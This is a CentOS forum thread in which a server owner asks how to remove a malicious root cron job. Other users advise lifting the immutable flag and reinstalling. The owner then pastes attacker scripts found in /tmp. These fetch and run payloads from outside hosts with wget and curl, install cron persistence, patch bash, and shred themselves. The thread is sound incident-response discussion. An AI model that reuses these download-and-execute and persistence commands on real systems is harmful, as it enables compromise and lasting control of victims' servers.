CentOS

The Community ENTerprise Operating System
https://forums.centos.org/

How can i remove the cron made by "stablehost" valenrabilty?

https://forums.centos.org/viewtopic.php?f=17&t=48804

Page 1 of 1

How can i remove the cron made by "stablehost" valenrabilty?

Posted: 2014/10/04 18:58:28
by tomingy
My box was just affected by

@weekly wget http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh >/dev/null 2>&1

few hours ago. But i think i am safe now because my bash version is

Code: Select all

[root@fr02 cron]# rpm -q bash
bash-4.1.2-15.el6_5.2.x86_64
It created a cron under root. In /var/spool/cron/root , it has above syntax.

Code: Select all

[root@fr02 cron]# crontab -l
@weekly wget http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh >/dev/null 2>&1
[root@fr02 cron]#
I tried to use crontab -e, use webmin to disable/remove, and even hard delete but all with no luck.

Code: Select all

in /var/spool/cron/root
...
-rw-------   1 root root  104 Oct  4 09:11 root
...
[root@fr02 cron]# rm root
rm: remove regular file `root'? y
rm: cannot remove `root': Permission denied
[root@fr02 cron]# echo '' > root
-bash: root: Permission denied
Is there a way to disable or remove it?

Thanks.

Re: How can i remove the cron made by "stablehost" valenrabi

Posted: 2014/10/04 22:20:55
by poky
Tray (before rm):
chattr -i -a root

Re: How can i remove the cron made by "stablehost" valenrabi

Posted: 2014/10/04 22:23:30
by TrevorH
If they have root access then you have no idea what else they have done. Your only safe option is to take that box off the net and reinstall it. It could have dozens of backdoors installed and you don't know any of them.

They had root access. They could have done anything to your machine. It might have a keylogger installed that's catching all your attempts to clean up. It could be sending your ssh keys and passwords out to who knows where...

Re: How can i remove the cron made by "stablehost" valenrabi

Posted: 2014/10/05 03:22:48
by tomingy
poky wrote:Tray (before rm):
chattr -i -a root
Thank you. It worked.

Re: How can i remove the cron made by "stablehost" valenrabi

Posted: 2014/10/05 03:46:02
by tomingy
TrevorH wrote:If they have root access then you have no idea what else they have done. Your only safe option is to take that box off the net and reinstall it. It could have dozens of backdoors installed and you don't know any of them.

They had root access. They could have done anything to your machine. It might have a keylogger installed that's catching all your attempts to clean up. It could be sending your ssh keys and passwords out to who knows where...
I agreed what you said. I need to reinstall the box.

I did not notice my box was affected until i received an email from the Cron Daemon.
--2014-10-05 00:00:01-- http://stablehost.us/bots/regular.bot
Resolving stablehost.us... failed: No address associated with hostname.
wget: unable to resolve host address “stablehost.us”
Then i immediately check /tmp, it contains the following sh script which were all created few hours ago.
[root@fr02 tmp]# vi .pwn

wget http://www.computer-services.name/b.c -O /tmp/b.c;
curl -o /tmp/b.c http://www.computer-services.name/b.c;
fetch -o /tmp/b.c http://www.computer-services.name/b.c;
wget http://www.computer-services.name/b.c -O /tmp/.c;
curl -o /tmp/.c http://www.computer-services.name/.c;
fetch -o /tmp/.c http://www.computer-services.name/.c;
gcc -o .d /tmp/b.c
chmod +x /tmp/.c
/tmp/.c
/tmp/.d
rm -rf /tmp/.a /tmp/b.c /tmp/.c /tmp/.d

echo "@weekly wget http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh >/dev/null 2&1" >>/tmp/c
crontab /tmp/c
rm -rf /tmp/c
@weekly wget http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh >/dev/null 2>&1
@daily wget http://xfsdfadsdgfs.tba.pw/update -O /tmp/update;sh /tmp/update;rm -rf /tmp/update
@daily wget http://update2.x24hr.com/update2 -O /tmp/update2;sh /tmp/update2;rm -rf /tmp/update2
@daily wget http://update.mrbonus.com/update3 -O /tmp/update3;sh /tmp/update3;rm -rf /tmp/update3
cron.weekly
#!/bin/sh
#wget http://stablehost.us/bots/regular.bot -O /tmp/sh
#curl -o /tmp/sh http://stablehost.us/bots/regular.bot
#sh /tmp/sh
#rm -rf /tmp/sh
img.sh
#!/bin/sh
starts=`pwd`
str=`date | md5sum | head -c8`
wget http://82.165.131.9/imgs.png -O $str;chmod +x $str;./$str;rm -rf $str
echo $str

echo "@daily wget http://xfsdfadsdgfs.tba.pw/update -O /tmp/update;sh /tmp/update;rm -rf /tmp/update">>/tmp/cc
echo "@daily wget http://update2.x24hr.com/update2 -O /tmp/update2;sh /tmp/update2;rm -rf /tmp/update2">>/tmp/cc
echo "@daily wget http://update.mrbonus.com/update3 -O /tmp/update3;sh /tmp/update3;rm -rf /tmp/update3">>/tmp/cc
crontab /tmp/cc
apt-get -y install bash&
yum -y update bash&
zypper --non-interactive update bash&


shred -f -u $starts/$0
rm -f $starts/$0
But it seems all hosts have been taken down. Then i run yum to update the bash.
All times are UTC
Page 1 of 1

Powered by phpBB® Forum Software © phpBB Limited